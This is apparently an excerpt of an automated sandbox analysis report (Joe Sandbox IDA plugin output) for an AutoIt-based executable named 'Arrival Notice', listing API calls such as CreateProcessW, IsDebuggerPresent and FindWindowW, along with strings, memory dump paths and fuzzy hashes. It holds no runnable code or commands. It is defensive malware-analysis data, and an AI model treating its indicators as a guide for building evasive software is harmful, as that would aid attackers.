                  • Opcode Fuzzy Hash: 141d3989d7bd64bf321faa2cf96518d391581a487ecb3f6f779a2d0bcb2d67c5
                  • Instruction Fuzzy Hash: 3C01A77578110867CB15EB90CA51AFF77A89B11344F14001BAB0B6B291FA689E48C6F9
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 00413CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00413CCA
                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00411CC8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: 79a77e4620d045983f21e34b03e388d555dc2fefc9130e4c49d343e8f5c9a6cd
                  • Instruction ID: e1965d5b20f7b1832ef09bcee7c03b4858245bb85c8428f34fced00b93a1b211
                  • Opcode Fuzzy Hash: 79a77e4620d045983f21e34b03e388d555dc2fefc9130e4c49d343e8f5c9a6cd
                  • Instruction Fuzzy Hash: AA01DB7568111867CF05EB90CA41BFF77A89B11344F240017BA0677291FA689F48D6F9
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 003CA529
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Init_thread_footer_wcslen
                  • String ID: ,%H$3y@
                  • API String ID: 2551934079-735046420
                  • Opcode ID: 123ee6a10c21707b8906225ed410a8cc8bd4c9043b253026ae0f0bc1386244f8
                  • Instruction ID: aafae29a9131d8ca8675abe7b58fc94f555ead172b9f979c44132651822e533d
                  • Opcode Fuzzy Hash: 123ee6a10c21707b8906225ed410a8cc8bd4c9043b253026ae0f0bc1386244f8
                  • Instruction Fuzzy Hash: 1401F732640A1897C507F768AC57FAD3358DB06B14F50446EF6019F2C2DE509D01879B
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 00413CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00413CCA
                  • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00411DD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: 5b1148d03205801986f291c06c7022461bcf700a57415cbd761bc37c0a5c8030
                  • Instruction ID: 29608d26b2bdef82a4c74a5e507dcf2389e504a09847796802cd1480deccbf0b
                  • Opcode Fuzzy Hash: 5b1148d03205801986f291c06c7022461bcf700a57415cbd761bc37c0a5c8030
                  • Instruction Fuzzy Hash: 9EF02D71B4121867CB04F7A4DC91FFF7778AB01344F14091BBA26672D1EA6469088268
                  APIs
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00483018,0048305C), ref: 004481BF
                  • CloseHandle.KERNEL32 ref: 004481D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CloseCreateHandleProcess
                  • String ID: \0H
                  • API String ID: 3712363035-1034350999
                  • Opcode ID: 904382f13c56daca313a247851ab1b68141e2300adb02817d8d147c7e76b50d0
                  • Instruction ID: 9a672b22595eddfc91be2e4f0fb03457b9f14e098a22a7480543871fefe49d1b
                  • Opcode Fuzzy Hash: 904382f13c56daca313a247851ab1b68141e2300adb02817d8d147c7e76b50d0
                  • Instruction Fuzzy Hash: 9FF054B5640300BAE3206F61AC45F7F3A5CDB06B56F004836BB08D91A2D6799E0093BD
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: 3, 3, 16, 1
                  • API String ID: 176396367-3042988571
                  • Opcode ID: 83d35535e2e45dbef22a31a21786eae451c41a0a1d4fc3fb3cd92c4cd87734fc
                  • Instruction ID: a5ed440a3f8e0cbee1528c81f823cb28de8840acc8a1a2cd56b20450ce0719be
                  • Opcode Fuzzy Hash: 83d35535e2e45dbef22a31a21786eae451c41a0a1d4fc3fb3cd92c4cd87734fc
                  • Instruction Fuzzy Hash: 87E02B43204320219232137BACC1A7F5689CFDD790B10282BF9C5C6366EBB89D9193A4
                  APIs
                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00410B23
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Message
                  • String ID: AutoIt$Error allocating memory.
                  • API String ID: 2030045667-4017498283
                  • Opcode ID: d69e34e1dc076c78156659cb7a2730191a6597ae3223c430c1708d289df40a6e
                  • Instruction ID: f48371f47be764a1c16dd011e142fc170e323bcafe3e94d68e3df1d96d2f036b
                  • Opcode Fuzzy Hash: d69e34e1dc076c78156659cb7a2730191a6597ae3223c430c1708d289df40a6e
                  • Instruction Fuzzy Hash: 05E0D8322853183BD21137947C43FC97B848F05B10F24442BF7489D5C38EE6689006ED
                  APIs
                    • Part of subcall function 003CF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,003D0D71,?,?,?,003B100A), ref: 003CF7CE
                  • IsDebuggerPresent.KERNEL32(?,?,?,003B100A), ref: 003D0D75
                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003B100A), ref: 003D0D84
                  Strings
                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003D0D7F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                  • API String ID: 55579361-631824599
                  • Opcode ID: 57acffd49a304a807f6da15993ffa26e02993df0ea5e005aea199baff91a72a1
                  • Instruction ID: a8bcacf5be89ace2d412ba3750f9a9f48c0d341fac7162e5bc664dbd80f19a27
                  • Opcode Fuzzy Hash: 57acffd49a304a807f6da15993ffa26e02993df0ea5e005aea199baff91a72a1
                  • Instruction Fuzzy Hash: 26E06DB42003018BE3659FB8E4447467BE5BB04B45F04897FE486C6761DBF4E4488BA5
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 003CE3D5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Init_thread_footer
                  • String ID: 0%H$8%H
                  • API String ID: 1385522511-2670815269
                  • Opcode ID: 2d119b7a68efc28c05740381e38745bb99576250a7a8a66e29b981b3d7b7d496
                  • Instruction ID: 6200eec2ea60da9b3caf180ef2572f9e84ecf178cbe20876d67c185177dc2374
                  • Opcode Fuzzy Hash: 2d119b7a68efc28c05740381e38745bb99576250a7a8a66e29b981b3d7b7d496
                  • Instruction Fuzzy Hash: E9E02036490950DBC607A79CB65CF4D3395EB06720B90097EE001CB5D19BB43C41874C
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LocalTime
                  • String ID: %.3d$X64
                  • API String ID: 481472006-1077770165
                  • Opcode ID: 3d9b9175abe794d7fdacf1c35b3754867c3f95ad9b2e8ab918e308cd545bd89b
                  • Instruction ID: 13ee48744e25b1f4f376efa4f073612c3718fad9bd1af980978c30708c423fa6
                  • Opcode Fuzzy Hash: 3d9b9175abe794d7fdacf1c35b3754867c3f95ad9b2e8ab918e308cd545bd89b
                  • Instruction Fuzzy Hash: 2CD01261C09118EACB9097D0DC45DB9B37CBB08301F6084BBF80AF1080D73CD90DAB6A
                  APIs
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044236C
                  • PostMessageW.USER32(00000000), ref: 00442373
                    • Part of subcall function 0041E97B: Sleep.KERNEL32 ref: 0041E9F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FindMessagePostSleepWindow
                  • String ID: Shell_TrayWnd
                  • API String ID: 529655941-2988720461
                  • Opcode ID: 38bccba3f040fa15498115882c12fee801bf2c41e08d014d07cebf44f702a51f
                  • Instruction ID: fdd2aec03b9d8036edd68a0697b30ea88d2798e40d0af0539595d5abada08a85
                  • Opcode Fuzzy Hash: 38bccba3f040fa15498115882c12fee801bf2c41e08d014d07cebf44f702a51f
                  • Instruction Fuzzy Hash: B9D0A97A382310BAE2A8A3329C4FFCA66149B01B00F0189267706AA0D0C8B4A8008A0C
                  APIs
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044232C
                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044233F
                    • Part of subcall function 0041E97B: Sleep.KERNEL32 ref: 0041E9F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FindMessagePostSleepWindow
                  • String ID: Shell_TrayWnd
                  • API String ID: 529655941-2988720461
                  • Opcode ID: ed571a6f868414b470a07ced33773ae46b2b00104a7a4fa7a6217c14eb79d873
                  • Instruction ID: 8257f545577a0905358945cbbc2e60f57d85569a9fb73039028efe1849a8948d
                  • Opcode Fuzzy Hash: ed571a6f868414b470a07ced33773ae46b2b00104a7a4fa7a6217c14eb79d873
                  • Instruction Fuzzy Hash: 02D0227A391310B7E2A8B332DC4FFCA7A149B00B00F018927770AAA0D0C8F4A800CA0C